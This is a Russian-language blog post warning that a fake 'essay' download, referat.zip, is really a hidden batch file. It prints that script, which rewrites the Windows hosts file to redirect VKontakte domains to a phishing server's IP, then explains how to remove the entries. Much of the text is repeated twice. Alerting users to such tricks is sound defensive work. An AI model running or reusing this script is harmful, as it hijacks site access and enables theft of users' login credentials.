Как рефераты маскируют под инструмент фишинга или как воруют пароли вконтакте
В очередном поиске реферата скачала себе на комп подозрительный файлик referat.zip.
Подозрительный ибо не в формате doc или rar..а мало того в формате bat, но замаскирован под zip.
Внутри файла вот такая штука:
cmdow @ /HID @echo off
echo -- >> %windir%\system32\drivers\etc\hosts
echo 94.103.92.151 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 94.103.92.151 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 94.103.92.151 vk.com >> %windir%\system32\drivers\etc\hosts
echo 94.103.92.151 www.vk.com >> %windir%\system32\drivers\etc\hosts
Собственно, как видно этот файл прописывает в хосты вашей винды перенаправление сайта вконтакте на фишинговый сервер. И при очередном открытии любимого контакта открывается совершенно другой сайт, при этом пользователь этого совершенно не замечает и вводит своё драгоценное имя и пароль.. Ну, а что происходит дальше наверное все знают "Хочешь узнать кто ему пишет?! На этом сайте ты сможешь читать его смс и следить за звонками" ))
Спасти от этой напасти может лишь удаление из файла hosts этого самого перенаправления. Простое удаление файла referat.zip вас не спасет. Кстате хорошая статья про nthost.
Будьте бдительны и да прибудет с вами сила здорового компа:)))
Подозрительный ибо не в формате doc или rar..а мало того в формате bat, но замаскирован под zip.
Внутри файла вот такая штука:
cmdow @ /HID @echo off
echo -- >> %windir%\system32\drivers\etc\hosts
echo 94.103.92.151 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 94.103.92.151 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 94.103.92.151 vk.com >> %windir%\system32\drivers\etc\hosts
echo 94.103.92.151 www.vk.com >> %windir%\system32\drivers\etc\hosts
Собственно, как видно этот файл прописывает в хосты вашей винды перенаправление сайта вконтакте на фишинговый сервер. И при очередном открытии любимого контакта открывается совершенно другой сайт, при этом пользователь этого совершенно не замечает и вводит своё драгоценное имя и пароль.. Ну, а что происходит дальше наверное все знают "Хочешь узнать кто ему пишет?! На этом сайте ты сможешь читать его смс и следить за звонками" ))
Спасти от этой напасти может лишь удаление из файла hosts этого самого перенаправления. Простое удаление файла referat.zip вас не спасет. Кстате хорошая статья про nthost.
Будьте бдительны и да прибудет с вами сила здорового компа:)))